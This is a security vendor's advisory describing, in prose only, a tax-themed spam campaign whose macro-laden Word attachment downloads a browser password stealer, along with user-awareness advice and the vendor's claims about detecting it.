What Is It?
As is inevitable at this time of year, there have been recent reports of large scale malicious spam campaigns based around tax related lures. One such campaign has been reported to involve tens of millions of malicious emails, containing an attachment named taxletter.doc.
The attackers have been observed regularly altering the text of the emails in an attempt to avoid detection by spam filters and other security products. However, the email subject and body text generally claims to be advising the recipient of an issue with their tax return or informing them of an unexpected tax windfall. The object of course is to get the recipient to open the attached malicious Word document and override their default warnings to allow the embedded macro to run.
In this case, once allowed to run by the user, the macro issues a Powershell command to download and execute a file from the bigrussiandomains[.]win site. The downloaded file, tax.exe, is then saved to the user’s Temporary directory as mixak.exe and executed.
The tax.exe malware is a password stealer, targeting, among others, passwords stored in browsers. Though convenient, storing of passwords in browsers makes it easier for attackers to obtain passwords such as banking and other financial credentials, social media credentials and credentials used for internal systems on the corporate network. These credentials can easily be monetized by attackers either using them to perform financial fraud directly or selling them. Internal credentials obviously greatly assist attackers with reconnaissance and lateral movement within a corporate network.
Once again, these attacks rely on socially engineering users to not only open an attachment but then allow macros to run. The reason these attacks continue to use this vector is that it continues to work in sufficient numbers to make it unnecessary for less skilled attackers to invest time and effort to use more sophisticated attacks.
How Does It Propagate?
None of the malware discussed here self propagates.
Once again these attacks utilize social engineering to be successful. Particularly at this time of year, it is important for users to be vigilant and aware of the likelihood of malicious emails using tax related lures.
When/How Did BluVector Detect It?
BluVector’s patented Machine Learning Engine (MLE) detects this malware. Regression testing on two malicious Word document samples has shown they would have been detected by BluVector 48 months prior to their release. The password stealer malware sample would have been detected 14 months prior to its release.